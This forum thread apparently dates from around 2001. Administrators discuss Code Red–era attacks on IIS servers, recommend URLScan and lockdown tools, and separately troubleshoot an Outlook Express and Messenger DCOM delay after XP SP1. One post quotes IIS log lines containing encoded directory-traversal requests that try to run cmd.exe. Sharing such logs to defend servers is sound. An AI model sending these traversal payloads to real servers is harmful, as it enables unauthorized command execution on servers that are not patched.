While it looks like someone might be trying to get something not normally asked for, I am not familiar with that exploit. If you would like to be rid of the vast majority of crap from these simple but effective attacks, check out this tool:
 
http://support.microsoft.com/support/kb/articles/q307/6/08.asp
 
It's URLScan, and would have dropped those requests immediately if configured to do so (which it would by default, I believe). There is another tool here:
 
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/locktool.asp
 
and while it works well, it broke my use of OWA (Outlook Web Access) and I wound up removing it. It's a bit more powerful, and is based on the idea of how to deal with a situation if you are compromised vs. the other tool which blocks intended compromising attacks.
 
There is also the high security web template, and has worked against Code Red and other attacks as well, but is almost non-existant in the installed base of IIS servers on the 'net. You can find the template here:
 
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/iis/tips/iis5chk.asp
 
down toward the middle. By the way, that page is also the security checklist for IIS5, and is full of useful information.
 
Hope this helps.

The attacks you list are part of Code Red. We have dozens of these in our event logs on our NT4 and 2000 IIS servers.
 
You can get a Code Red removal tool from Symantec which will remove the files and do a basic test to see if that machine is at risk.

Cool. I haven't seen entries like that in my event logs (probably due to the lockdown tools), but I do see the attacks via my IIS logs like so:
 
65.29.76.242 - 10/15/2001 10:49:09 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%252f../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/root.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /MSADC/root.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /c/winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /d/winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%255c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
 
That is one attack cycle, and I track these via an ASP app (which this was copied from) that queries my SQL logs DB. I am up to 900 hits today as of this post since midnight.

i just astarted to get that dcom error at home.
it only happens when i open outlook express.
seems that msmessenger is also trying to open but since i never set it up (i removed it actually) the thing times out
now my outlook express takes a long time to open
 
this only happened since xp sp1

If there's a delay opening Outlook Express, then it might be the same issue that affects Outlook. In Outlook, you can disable its ability to launch MS Messenger from within Tools>Options>Other. You might have something similar in OE.

check this out. i will have to say this is a dirty trick from ms
 
if i allow messenger in the group policy then oe opens instantly.
and messenger also opens, even though i removed it from windows components
 
if i disable access to messenger then i get the dcom error in the sys events and oe opens really slow
 
this is a new thing in sp1
im scanning the registry

I thought that SP1 reinstalls MSMessenger if it wasn't there. Hence your seeing it now. The delay behavior is consistent with Outlook when it is setup to launch MSMessenger and it isn't able to.

i removed messenger from the windows components and set
use my current instant messaging service
in the new window sp1 has to comply with the feds
viola' no more messenger when i boot
 
then i open oe and BAM!! there it is.
if i disable access thru group policy then i get the delay but no messenger.
 
seems that outlook express opens messenger even if it's uninstalled and the only way to get rid of it is to deny access thru gpedit, but the service still trys to connect which is the cause of the "dcom" error.
 
i really like ms but man that goes a little overboard.

Right, so you have to look for a way to tell OE not to launch MSMessenger anymore.

absolutely
so far im stumped (course im sposed to be working right now)
 
there were a couple of posts at this site telling of slow oe

I suggest you visit http://wwwmonitortools.com/cat_web/, they have plenty of tools listed to verify if your IIS server is patched well.
 
Regards,
 
Bart.